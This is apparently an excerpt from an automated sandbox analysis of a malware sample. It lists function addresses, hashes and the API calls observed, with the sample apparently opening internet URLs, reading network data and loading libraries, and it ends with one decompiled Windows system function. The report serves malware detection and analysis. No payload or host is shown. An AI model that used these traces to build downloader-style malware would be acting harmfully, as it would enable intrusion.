                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E990048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E990078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B3065, Relevance: 3.1, APIs: 2, Instructions: 124networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetOpenA.WININET(001B36E3,00000000,00000000,00000000,00000000), ref: 001B3075
                    • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 001B3135
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: InternetOpen
                    • String ID:
                    • API String ID: 2038078732-0
                    • Opcode ID: c232d9fc68feea7f1cf8b56284282e5b699399b4ae613a7065e6cccd1fc642c9
                    • Instruction ID: f0387fa4bcb7b86e55a38a109098cec53638d918e284299cfc6987acf3e3d97c
                    • Opcode Fuzzy Hash: c232d9fc68feea7f1cf8b56284282e5b699399b4ae613a7065e6cccd1fc642c9
                    • Instruction Fuzzy Hash: 5741E63024038AABEF355E54CDA5FFE3769AF00780F508129FD9AAA190EB70C654AA10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B50F4, Relevance: 1.7, APIs: 1, Instructions: 192COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 820c01e398c8ac914f2f4dd100bcc53ff887bca8876c1ce3cc12604a767d318d
                    • Instruction ID: 12287eadea413c02c96dc31a6597aa9f107054f34b476b8835cfdfd29960a1fc
                    • Opcode Fuzzy Hash: 820c01e398c8ac914f2f4dd100bcc53ff887bca8876c1ce3cc12604a767d318d
                    • Instruction Fuzzy Hash: E6517F20646B16EBEB35376C5D657F722E79F163A0FE94225DCC2875D2E32888C1C642
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B6039, Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8e5038dde8e7f07ae646b17e552c37e9d4603d57097b97616dc4954fefa9063b
                    • Instruction ID: 5759dfaaba83337f0057bba2311ab4a4aa4a396b7009db4c2f462f14da320a45
                    • Opcode Fuzzy Hash: 8e5038dde8e7f07ae646b17e552c37e9d4603d57097b97616dc4954fefa9063b
                    • Instruction Fuzzy Hash: 55419B35204306CEEF291E38C8A47F67B93BF72320FAA5169D946C74A1E33C88C5D601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B5FC1, Relevance: 1.6, APIs: 1, Instructions: 138filenetworkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: e4f6d4936681bae7ed82004eb08427368475e654e465bac59e5dd261f05f7652
                    • Instruction ID: 31d4c2a72f8bacda31977efca1180b8eb5abbc3b27d7eb081a521b1417b51d38
                    • Opcode Fuzzy Hash: e4f6d4936681bae7ed82004eb08427368475e654e465bac59e5dd261f05f7652
                    • Instruction Fuzzy Hash: 77418A35204306CEEB396E34C9A47F57793BF72320FAA5169D956C75A1E33C88C5D601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B5FE5, Relevance: 1.6, APIs: 1, Instructions: 133filenetworkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: d43752ed222de2f07a970f03f62b49e04636d42826f0873387e8b061e4c0ea28
                    • Instruction ID: 7dee3e326d57f75513370e819aac1e11c9b776b4a3035540adfd59ee99241571
                    • Opcode Fuzzy Hash: d43752ed222de2f07a970f03f62b49e04636d42826f0873387e8b061e4c0ea28
                    • Instruction Fuzzy Hash: F4416835200306CEEB292E38C9647E67793BF72320FAA5569D956C75A1E33C88C5DA01
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B6015, Relevance: 1.6, APIs: 1, Instructions: 126filenetworkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: da1907745b5f16c4153e732f3ab223196740eccdc58baa17209fcf62c5369363
                    • Instruction ID: 5b34e598bedc26c696222f4efe6381a1f3bfe620ac4d037d1aeb873943e79d11
                    • Opcode Fuzzy Hash: da1907745b5f16c4153e732f3ab223196740eccdc58baa17209fcf62c5369363
                    • Instruction Fuzzy Hash: DE317735200306CEEB292E34C8647E67793BF72320FAA5569D856C75B5D33C88C5DA01
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B6089, Relevance: 1.6, APIs: 1, Instructions: 115filenetworkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: cbe42170eda2a0b31139f48023a8f778f09492e3f8f65b2cdd921b6a5eb05a79
                    • Instruction ID: e0f2b12bde0f32e5c43591493c58eb6e434f7d1b7788c3763254469e876830c4
                    • Opcode Fuzzy Hash: cbe42170eda2a0b31139f48023a8f778f09492e3f8f65b2cdd921b6a5eb05a79
                    • Instruction Fuzzy Hash: C8314835600206CEEF292E38C8647E67BA2BF72320FEA5569C896C7571D37CC9C5DA41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B60D1, Relevance: 1.6, APIs: 1, Instructions: 109filenetworkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: c93ce533108b93e81efe02108c1f0c7fa303f673b485247b83a5cfd542ac9bb5
                    • Instruction ID: ce78890ccda122f8cf6fccb4265ee049dd8ca64121fc635aebeaa89cbe86b1cf
                    • Opcode Fuzzy Hash: c93ce533108b93e81efe02108c1f0c7fa303f673b485247b83a5cfd542ac9bb5
                    • Instruction Fuzzy Hash: 06315835600206CEEF285E38C8647E67BA2BF72320FEA5569C896CB571D37CC8C5CA41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B6106, Relevance: 1.6, APIs: 1, Instructions: 103filenetworkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: 5cf53c7d16e79977f75a20c76f60ca71b611e1c225de6ef4e8165a3e437b22dd
                    • Instruction ID: 7552cf4d0b529f794ef121611e737e2604c5f716175ed54da2d02e06c3dabfb0
                    • Opcode Fuzzy Hash: 5cf53c7d16e79977f75a20c76f60ca71b611e1c225de6ef4e8165a3e437b22dd
                    • Instruction Fuzzy Hash: D5312735600206CEEB295E38C8647E57BD2BF72320FEA5169C896CB5B1D33CC9C9CA41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B1F7E, Relevance: 1.6, APIs: 1, Instructions: 86threadCOMMON
                    Download Yara Rule
                    APIs
                    • TerminateThread.KERNELBASE(000000FE,00000000), ref: 001B1F98
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: TerminateThread
                    • String ID:
                    • API String ID: 1852365436-0
                    • Opcode ID: e92dd91ca125e63e3076cd073202b9e0c2120dea8f5831548b7e065d1ee819e1
                    • Instruction ID: fafa1b9d56115286c6506cbf8566599cd63f3a29c19f8287229ee6c0af451eea
                    • Opcode Fuzzy Hash: e92dd91ca125e63e3076cd073202b9e0c2120dea8f5831548b7e065d1ee819e1
                    • Instruction Fuzzy Hash: EE216870204315AFCB24AE6889E47EE3799DF1A360FB14316ED52C72D2D37288C9D523
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B30A5, Relevance: 1.6, APIs: 1, Instructions: 83networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 001B3135
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: InternetOpen
                    • String ID:
                    • API String ID: 2038078732-0
                    • Opcode ID: feb18598b401ffec5788795f38330becb4956db7c97b57c4cc12237419fcc0f6
                    • Instruction ID: 79a09b409450758b3c802d3323b000ada9f28fcbe5497df2fb6456d990d9da1a
                    • Opcode Fuzzy Hash: feb18598b401ffec5788795f38330becb4956db7c97b57c4cc12237419fcc0f6
                    • Instruction Fuzzy Hash: 7021B63034034AABFB344E54CDA5BFB37A9DF11780F508028FE9AEA190E770D654EA10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B5336, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f8160578b63f83e872e5b7f606f360f207e19262112eecf1df1a24175e0b2d09
                    • Instruction ID: 8dfbf6b705737975e349366365860a2af4f2468a44f962e7ed9d776eddabfbe1
                    • Opcode Fuzzy Hash: f8160578b63f83e872e5b7f606f360f207e19262112eecf1df1a24175e0b2d09
                    • Instruction Fuzzy Hash: 1F117494A0135AAAFF383AB05DA1BF612569F26770FF48226FD92D7083D359C8845603
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B61ED, Relevance: 1.6, APIs: 1, Instructions: 79filenetworkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: 7d2cc9a9980ce75b53456217ff6a9159e5023449964feed892f952dc84ba6c43
                    • Instruction ID: d47d8e0a990f73e440dc20af3bb0e41e576c0087f05f412389adb6f2515da27c
                    • Opcode Fuzzy Hash: 7d2cc9a9980ce75b53456217ff6a9159e5023449964feed892f952dc84ba6c43
                    • Instruction Fuzzy Hash: 6F21F634601206CEEB245E34C8687E57BE2BF32320FD95559C89ACB5B4D338C9D5CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B46F9, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 952da18728ebe144b327b1e76ad01120048368fc77f65a97f3ddd1f7d23eecbc
                    • Instruction ID: 288f51b5e906cea62a4b69b17c477c4da94ff85b662b1137d8774baf64a03963
                    • Opcode Fuzzy Hash: 952da18728ebe144b327b1e76ad01120048368fc77f65a97f3ddd1f7d23eecbc
                    • Instruction Fuzzy Hash: 15012654A0125ABFEF2836F46D01BF722568F66BA0F98C12AFCC1C3047D724C8846643
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B6239, Relevance: 1.6, APIs: 1, Instructions: 65filenetworkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: fbafeb0e1a69d98279b6a8d12122e00519fee77eb97c5721d693cefb396c3f6e
                    • Instruction ID: 79f3e8c1230aeac3fec03095ddeadc44ef654b95dd0903e78b524f65515bb2cd
                    • Opcode Fuzzy Hash: fbafeb0e1a69d98279b6a8d12122e00519fee77eb97c5721d693cefb396c3f6e
                    • Instruction Fuzzy Hash: 3F112338A0020ACEEB255E34C8683E1BBE2BF32324FD95159C8898B471D338C9D4CA41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B3119, Relevance: 1.6, APIs: 1, Instructions: 57networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 001B3135
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: InternetOpen
                    • String ID:
                    • API String ID: 2038078732-0
                    • Opcode ID: bc856a6568525b9a6ff4c3e149fc0a0c30de5ec47769609975933ccb673777b1
                    • Instruction ID: eef5c46fa89ddcc4ed587aefa80c5e48720ab8538f1b070d9d5058b336842f7e
                    • Opcode Fuzzy Hash: bc856a6568525b9a6ff4c3e149fc0a0c30de5ec47769609975933ccb673777b1
                    • Instruction Fuzzy Hash: 9B11563024038BABFB348E55CDA5FFB77699F50780F548428ED9AEA140E770D654EA14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B481A, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(?,595014AD,?,001B23F1,?,00000000,00000000,?,?,?,00000000,00000004,00000000,00000000,?,?), ref: 001B48E9
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: e79ac11a7ea172bd05ac55158044cc142db0d91c817158d68eacd1ff2f2a1aed
                    • Instruction ID: 8902b62fde5958e459d813571fa67d477215c668a0dbd8d539149b3c10f89fac
                    • Opcode Fuzzy Hash: e79ac11a7ea172bd05ac55158044cc142db0d91c817158d68eacd1ff2f2a1aed
                    • Instruction Fuzzy Hash: D5F02B54A41259FBEF3436B02D42BFB16598F65760FE5C116FCC1D60438328C8882A47
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B4835, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(?,595014AD,?,001B23F1,?,00000000,00000000,?,?,?,00000000,00000004,00000000,00000000,?,?), ref: 001B48E9
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 2b9e6a41fd05225e4aaa53531420a76ff69fc221b9702e7bc46b208d47ddfb2f
                    • Instruction ID: a6006503581bc8466bc91c8faf44da1d173b96d4e2807b639288b6d793a4542a
                    • Opcode Fuzzy Hash: 2b9e6a41fd05225e4aaa53531420a76ff69fc221b9702e7bc46b208d47ddfb2f
                    • Instruction Fuzzy Hash: 82F02454A01248BBFF3437B11E027FB12A98F24710FE5C129FCC1DA003D728C8841A07
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B4877, Relevance: 1.5, APIs: 1, Instructions: 38libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(?,595014AD,?,001B23F1,?,00000000,00000000,?,?,?,00000000,00000004,00000000,00000000,?,?), ref: 001B48E9
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 8f9d8d9f4e7a368c85875c908b39264b3ed115b4f92ea2dc9bf63cb5483c7733
                    • Instruction ID: 8f4ce72ef63fde0cd4f04e9942b5e1defaee7159bd6286b668d10afd1be2c0e9
                    • Opcode Fuzzy Hash: 8f9d8d9f4e7a368c85875c908b39264b3ed115b4f92ea2dc9bf63cb5483c7733
                    • Instruction Fuzzy Hash: F4F0E544A01249FBDF343BB45D067EB26998F29764FD8D216FCD4EA183D728C4851B47
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B62C5, Relevance: 1.5, APIs: 1, Instructions: 37filenetworkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: 2f58cb3c5456eac9d60582526df4f566d01b0efe435bd26f3126466fd99c82ce
                    • Instruction ID: 75ee35de0959c7cccb3de7d40c8c3276a2416e8312ef03ff85b611df511b5a88
                    • Opcode Fuzzy Hash: 2f58cb3c5456eac9d60582526df4f566d01b0efe435bd26f3126466fd99c82ce
                    • Instruction Fuzzy Hash: 87F0E526B813578DAB2A6A38C9B43E22B67BD733207CC4545CC85CB978F725C9D5C205
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B48BD, Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(?,595014AD,?,001B23F1,?,00000000,00000000,?,?,?,00000000,00000004,00000000,00000000,?,?), ref: 001B48E9
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 86d1ae167f1264ff4e123195bd4254e48aca8fff0e1bf20852924967b30914b6
                    • Instruction ID: a8ba3c70811d9c947b1c834796f859ff7f8ebda9747885b5c4f05620308dacbf
                    • Opcode Fuzzy Hash: 86d1ae167f1264ff4e123195bd4254e48aca8fff0e1bf20852924967b30914b6
                    • Instruction Fuzzy Hash: B0D02E28A0031AF35F243F711D0ABDF22618D28B94BE8C255FCC4EB007CB38C0860E46
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B2D7D, Relevance: 1.5, APIs: 1, Instructions: 17fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,001B2D17,001B2DB4), ref: 001B2D9F
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 72377ccdd72571d04adc792edf7030eface8fb63f8d8763f2bcf66cff2b2072c
                    • Instruction ID: be21ac10a46487251ea4766ae79e9ebefdae682190105c2b5de3e35a789d3362
                    • Opcode Fuzzy Hash: 72377ccdd72571d04adc792edf7030eface8fb63f8d8763f2bcf66cff2b2072c
                    • Instruction Fuzzy Hash: 4DD0C974398304BAF9244920AD6BFD661175B92F84E90810DBF4D292C143E75951C516
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B6325, Relevance: 1.5, APIs: 1, Instructions: 14filenetworkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: 1b363aea7f51bcad3bb88953dae251e8b57876ea322b0870d96448b80e178b92
                    • Instruction ID: 6bb1d40b6e87a55ef1803b0a8aef0ba2c9e039474bc37fea8c6ef034706d8238
                    • Opcode Fuzzy Hash: 1b363aea7f51bcad3bb88953dae251e8b57876ea322b0870d96448b80e178b92
                    • Instruction Fuzzy Hash: F4D012245513054D7F196D71C6E438A3A666CA5104798891CD882D2518EB31C4498514
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 1E9B8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                    Download Yara Rule
                    C-Code - Quality: 94%
                    			E1E9B8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E1E9B8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E1E99E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E1E9B718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E1E9B8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E1E9B718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E1E9B8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E1E9B8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E1E9B8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E1E9B718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E1E99E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E1E992340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E1E9AE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E1E99E2A8(_t322,  &_v68, _v16);
								if(E1E9B5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E1E9AE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E1E99E2A8(_t322,  &_v68, _t236);
								if(E1E9B5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E1E9B718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E1E99E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
